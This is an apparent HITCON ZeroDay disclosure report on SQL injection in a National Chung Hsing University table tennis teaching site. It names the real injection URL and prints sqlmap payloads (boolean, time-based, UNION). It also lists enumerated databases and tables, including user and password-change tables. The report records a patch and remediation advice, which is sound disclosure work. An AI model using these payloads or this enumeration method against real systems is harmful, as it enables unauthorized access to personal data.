National Chung Hsing University (國立中興大學): SQL injection on one of its sites - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00404
  • Vendor: 國立中興大學 (National Chung Hsing University)
  • Title: SQL injection on a National Chung Hsing University site
  • Introduction: SQL injection in the National Chung Hsing University table tennis teaching system

Handling Status

Current status

Published
Last Update : 2018/11/24
  • New submission
  • Reviewed
  • Reported to vendor
  • Patched
  • Not re-tested
  • Published

Handling History

  • 2018/04/06 23:45:51 : New submission (status updated by Cra5h)
  • 2018/04/07 00:27:15 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2018/04/07 20:03:33 : Being patched (status updated by the HITCON ZeroDay service team)
  • 2018/04/07 20:03:34 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2018/04/07 20:03:35 : Being patched (status updated by the HITCON ZeroDay service team)
  • 2018/06/06 03:00:19 : Published (updated automatically by the HITCON ZeroDay platform)
  • 2018/11/16 18:10:06 : Patched (status updated by the HITCON ZeroDay service team)
  • 2018/11/24 03:00:21 : Published (updated automatically by the HITCON ZeroDay platform)

Details

  • ZDID: ZD-2018-00404
  • Reporter: cra5h (Cra5h)
  • Risk: High
  • Type: Database injection attack (SQL Injection)

References

An attacker can exploit this vulnerability to gain access to the back-end database and its complete contents (including large amounts of user personal data or other sensitive data), and may also be able to destroy or modify that data.

Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(This field is generated automatically by the system from the vulnerability category and is provided as reference material.)

Related URLs

http://tt.sim.nchu.edu.tw/index.php?bid=32

Description

SQL injection in the National Chung Hsing University table tennis teaching system
Injection point:
http://tt.sim.nchu.edu.tw/index.php?bid=32
The bid parameter is not properly filtered, which results in SQL injection.

sqlmap resumed the following injection point(s) from stored session:

Parameter: bid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bid=32 AND 3020=3020

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: bid=32 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: bid=-6592 UNION ALL SELECT NULL,CONCAT(0x717a6a6b71,0x444e47495754504e42534a5775626f6e5553766675664d48444a4262455874655662646a464f4c42,0x7171716271),NULL,NULL,NULL,NULL-- jFLN

[23:04:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, Microsoft IIS 7.0, PHP 5.2.8
back-end DBMS: MySQL >= 5.0.12
[23:04:20] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tt.sim.nchu.edu.tw'

Confirmed affected databases (9 databases):
available databases [9]:
[*] chu_phytest
[*] demo_phytest
[*] information_schema
[*] phytest
[*] phytest2
[*] phytest3
[*] sport
[*] test
[*] volleyball

[23:06:17] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tt.sim.nchu.edu.tw'

Row counts per table:
Database: demo_phytest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 4371 |
| sniffer | 1015 |
| option_data43 | 492 |
| user | 377 |
| userdata | 371 |
| score | 348 |
| option_data44 | 234 |
| option_data42 | 200 |
| question_data43 | 145 |
| exam_question | 80 |
| question_data44 | 74 |
| question_data42 | 66 |
| level | 63 |
| purview | 32 |
| functions | 27 |
| photoshow | 20 |
| title | 18 |
| bulletin | 14 |
| downloads | 13 |
| exam_data | 12 |
| exam_index | 12 |
| changepassword | 11 |
| modules | 7 |
| title_downloads | 6 |
| exam_history | 5 |
| unit | 5 |
| links | 4 |
| group | 3 |
| content | 3 |
| chapter | 2 |
| announce | 1 |
| counter | 1 |
| online | 1 |
| simulate_data | 1 |
| simulate_index | 1 |
+---------------------------------------+---------+

Database: phytest3
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 208 |
| option_data18 | 154 |
| option_data16 | 142 |
| option_data17 | 114 |
| question_data18 | 65 |
| question_data16 | 61 |
| question_data17 | 48 |
| option_data20 | 27 |
| option_data19 | 25 |
| functions | 22 |
| option_data21 | 17 |
| purview | 15 |
| question_data19 | 10 |
| question_data20 | 9 |
| modules | 7 |
| question_data21 | 7 |
| chapter | 6 |
| user | 4 |
| simulate_question | 4 |
| userdata | 4 |
| group | 3 |
| online | 2 |
| tutorialdir | 2 |
| announce | 1 |
| simulate_data | 1 |
| simulate_index | 1 |
+---------------------------------------+---------+

Database: phytest2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 565 |
| simulate_question | 415 |
| user | 170 |
| option_data26 | 106 |
| option_data33 | 100 |
| userdata | 92 |
| option_data35 | 62 |
| option_data22 | 47 |
| option_data24 | 44 |
| option_data30 | 44 |
| practice_result | 42 |
| question_data33 | 38 |
| option_data23 | 36 |
| option_data18 | 34 |
| question_data26 | 34 |
| simulate_data | 33 |
| simulate_index | 33 |
| option_data25 | 32 |
| option_data19 | 31 |
| option_data20 | 28 |
| functions | 22 |
| option_data28 | 22 |
| question_data35 | 22 |
| option_data21 | 20 |
| chapter | 19 |
| question_data30 | 19 |
| option_data27 | 18 |
| purview | 16 |
| question_data22 | 16 |
| question_data24 | 15 |
| question_data18 | 12 |
| question_data23 | 12 |
| question_data25 | 12 |
| option_data16 | 10 |
| option_data29 | 10 |
| question_data19 | 10 |
| question_data20 | 10 |
| modules | 7 |
| question_data28 | 6 |
| question_data29 | 6 |
| question_data27 | 5 |
| option_data34 | 4 |
| question_data21 | 4 |
| question_data16 | 3 |
| group | 2 |
| announce | 2 |
| option_data17 | 2 |
| question_data17 | 1 |
| question_data34 | 1 |
+---------------------------------------+---------+

Database: volleyball
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 4607 |
| sniffer | 1945 |
| option_data43 | 492 |
| option_data42 | 197 |
| question_data43 | 145 |
| option_data57 | 71 |
| question_data42 | 65 |
| option_data55 | 62 |
| user | 56 |
| userdata | 55 |
| level | 52 |
| option_data53 | 52 |
| option_data59 | 48 |
| option_data50 | 46 |
| option_data54 | 45 |
| option_data49 | 44 |
| option_data52 | 44 |
| option_data58 | 43 |
| option_data51 | 40 |
| option_data61 | 38 |
| purview | 32 |
| functions | 27 |
| question_data57 | 25 |
| title | 21 |
| question_data55 | 17 |
| question_data53 | 16 |
| question_data49 | 15 |
| question_data50 | 14 |
| bulletin | 13 |
| question_data52 | 13 |
| question_data54 | 13 |
| question_data59 | 13 |
| question_data51 | 12 |
| unit | 12 |
| chapter | 11 |
| downloads | 11 |
| question_data58 | 11 |
| question_data61 | 10 |
| modules | 7 |
| photoshow | 5 |
| links | 4 |
| title_downloads | 4 |
| group | 3 |
| content | 3 |
| changepassword | 2 |
| counter | 1 |
| online | 1 |
+---------------------------------------+---------+

Database: chu_phytest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| option_data43 | 492 |
| option_data44 | 220 |
| option_data42 | 197 |
| question_data43 | 145 |
| question_data44 | 70 |
| question_data42 | 65 |
| title | 54 |
| purview | 30 |
| functions | 26 |
| exam_question | 20 |
| downloads | 13 |
| unit | 10 |
| modules | 7 |
| title_downloads | 6 |
| links | 4 |
| chapter | 3 |
| content | 3 |
| user | 2 |
| userdata | 2 |
| announce | 1 |
| exam_data | 1 |
| exam_index | 1 |
| online | 1 |
+---------------------------------------+---------+

Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 4111 |
| option_data43 | 275 |
| option_data42 | 144 |
| user | 135 |
| userdata | 135 |
| level | 130 |
| question_data43 | 73 |
| question_data42 | 46 |
| purview | 29 |
| exam_question | 25 |
| functions | 22 |
| modules | 7 |
| group | 3 |
| chapter | 3 |
| exam_data | 3 |
| exam_index | 3 |
| announce | 1 |
| online | 1 |
| simulate_data | 1 |
| simulate_index | 1 |
+---------------------------------------+---------+

Database: phytest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| sniffer | 10511 |
| question_index | 4532 |
| option_data43 | 499 |
| user | 323 |
| level | 316 |
| userdata | 316 |
| option_data42 | 206 |
| question_data43 | 148 |
| changepassword | 141 |
| option_data48 | 81 |
| option_data53 | 80 |
| question_data42 | 68 |
| title | 64 |
| option_data55 | 55 |
| option_data54 | 53 |
| photoshow | 52 |
| option_data47 | 47 |
| option_data51 | 38 |
| purview | 32 |
| option_data49 | 29 |
| option_data50 | 28 |
| functions | 27 |
| question_data53 | 25 |
| question_data48 | 23 |
| bulletin | 22 |
| question_data54 | 16 |
| question_data51 | 15 |
| question_data55 | 15 |
| downloads | 14 |
| question_data47 | 14 |
| question_data50 | 11 |
| unit | 11 |
| chapter | 10 |
| question_data49 | 8 |
| modules | 7 |
| title_downloads | 7 |
| links | 5 |
| group | 3 |
| content | 3 |
| counter | 1 |
| online | 1 |
| simulate_data | 1 |
| simulate_index | 1 |
+---------------------------------------+---------+

Database: sport
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| member | 162 |
| rule | 139 |
| rulecpic | 89 |
| judgetechpic | 84 |
| rulepic | 51 |
| casediscussionre | 27 |
| sign | 25 |
| judgetech | 16 |
| rulec | 14 |
| bulletin | 13 |
| casediscussion | 13 |
| judgetechvedio | 13 |
| discussion | 11 |
| discussionre | 9 |
| downloads | 8 |
| connection | 7 |
| team | 7 |
| recordspic | 2 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2503 |
| PARTITIONS | 423 |
| TABLES | 423 |
| STATISTICS | 405 |
| KEY_COLUMN_USAGE | 397 |
| TABLE_CONSTRAINTS | 390 |
| SESSION_VARIABLES | 321 |
| GLOBAL_STATUS | 310 |
| GLOBAL_VARIABLES | 310 |
| SESSION_STATUS | 310 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195 |
| COLLATIONS | 195 |
| SCHEMA_PRIVILEGES | 45 |
| CHARACTER_SETS | 39 |
| PLUGINS | 20 |
| ENGINES | 9 |
| SCHEMATA | 9 |
| REFERENTIAL_CONSTRAINTS | 8 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

[23:11:16] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tt.sim.nchu.edu.tw'

Remediation Advice

Input filtering and parameterized queries.
